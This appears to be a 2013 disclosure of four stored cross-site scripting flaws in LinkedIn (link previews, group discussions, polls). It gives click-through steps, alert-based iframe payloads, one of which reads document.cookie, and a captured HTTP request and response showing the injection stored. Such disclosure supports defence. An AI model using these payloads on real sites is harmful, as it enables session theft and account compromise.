=============================
First XSS -> Corrected
=============================
You can go to LinkedIn Home -> Shared an Update -> Attach Link. After attack link, you should edit this link, and put in the Title and Description field, the XSS injection, for example:
+ <h1>XSS TEST</h1>
+ <iframe src="javascript:alert(document.cookie);"></iframe>
Finally, you should pulse "Preview" button, and then show you the injection.
The vulnerability is in this code:
XSSINJECTION
URLTITLE
XSSINJECTION Edit <script id="control-a9f0c4dd-2797-4750-9243-add575e00c08-2" type="linkedin/control" class="li-control"> /* extlib: _toggleclass */ LI.Controls.addControl('control-a9f0c4dd-2797-4750-9243-add575e00c08-2', 'ToggleClass', { classname: 'is-view-mode', on: '#share-preview', stopEvent: true }); </script>
=============================
Second XSS
=============================
You can go to LinkedIn Groups -> Groups you may like, and find some
open group, for example "Test Analyst / Test Lead / Test Manager
Networking". After, you
can start Discussion, and put on the fields "Test" and "test" value and
pulse "share" button. When the discussion is shared, show you "Your post
has been
submitted for review. You can view it here.", if you go to "here" link,
you can edit your post and put, for example, this code:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
Example REQUEST:
POST /groupItem HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
Referer: http://www.linkedin.com/groups?displayMySubmitted=&gid=4041084&goback=%2Egmp_4041084
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XXX
editPendingItem=&csrfToken=ajax:8141336854842107468&item=PMOD_43011393&gid=4041084&ajax=true&goback=.gmp_4041084&content=<IFRAME
SRC=#
onmouseover="alert('XSS')">&detail=test&
RESPONSE:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Date: Mon, 04 Mar 2013 14:51:03 GMT
X-FS-TXN-ID: 2adf39a79210
X-FS-UUID: c84a30f8753fe812d0841ff4322b0000
X-LI-UUID: yEow+HU/6BLQhB/0MisAAA==
Age: 0
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Set-Cookie: XXX
{"abbreviatedContent":"<IFRAME SRC=# onmouseover=\"alert('XSS')\">
...","editTimeLeftAsStr":"13 minutes
left","statusCode":"0","updated":"true","editTimeLeftInSec":"791","item":"PMOD_43011393","origDetail":"test","isDetailAbbreviated":"false","origContent":"<IF
RAME SRC=#
onmouseover=\"alert('XSS')\">","isContentAbbreviated":"true","fullContent":"<IFRAME
SRC=# onmouseover=\"alert
('XSS')\">","abbreviatedDetail":"test"}
and then show you the injection.
=============================
Third XSS
=============================
You can go to LinkedIn Groups -> Create a Group, and create new group.
After, you can start Discussion, and put on the fields, for example,
this code:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
Pulse "share" button and then show you the injection.
===============
Fourth XSS
===============
You can go to LinkedIn Groups -> Create a Group, and create new group.
After, you can create a Poll, and put on the fields, for example, this code:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
Pulse "share" button and then show you the injection.